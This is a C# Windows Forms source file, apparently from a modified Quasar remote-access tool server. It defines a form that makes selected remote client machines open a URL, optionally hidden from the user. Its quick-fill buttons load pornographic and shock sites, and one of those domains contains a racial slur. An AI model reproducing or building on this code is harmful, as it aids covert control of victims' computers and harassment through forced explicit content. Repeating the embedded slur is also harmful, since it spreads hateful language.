Files
2026-08-27 11:22:16 -06:00

40 lines
1.4 KiB
C#

using System;
using System.Windows.Forms;
using Quasar.Server.Helper;
namespace Quasar.Server.Forms
{
public partial class FrmVisitWebsite : Form
{
public string Url { get; set; }
public bool Hidden { get; set; }
private readonly int _selectedClients;
public FrmVisitWebsite(int selected)
{
_selectedClients = selected;
InitializeComponent();
}
private void FrmVisitWebsite_Load(object sender, EventArgs e)
{
this.Text = WindowHelper.GetWindowTitle("Visit Website", _selectedClients);
}
private void btnVisitWebsite_Click(object sender, EventArgs e)
{
Url = txtURL.Text;
Hidden = chkVisitHidden.Checked;
this.DialogResult = DialogResult.OK;
this.Close();
}
private void btnQ1_Click(object sender, EventArgs e) { txtURL.Text = "https://www.pornhub.com/gay"; }
private void btnQ2_Click(object sender, EventArgs e) { txtURL.Text = "https://www.niggafart.com"; }
private void btnQ3_Click(object sender, EventArgs e) { txtURL.Text = "https://www.lemonparty.org"; }
private void btnQ4_Click(object sender, EventArgs e) { txtURL.Text = "https://nhentai.net"; }
private void btnQ5_Click(object sender, EventArgs e) { txtURL.Text = "https://e621.net"; }
}
}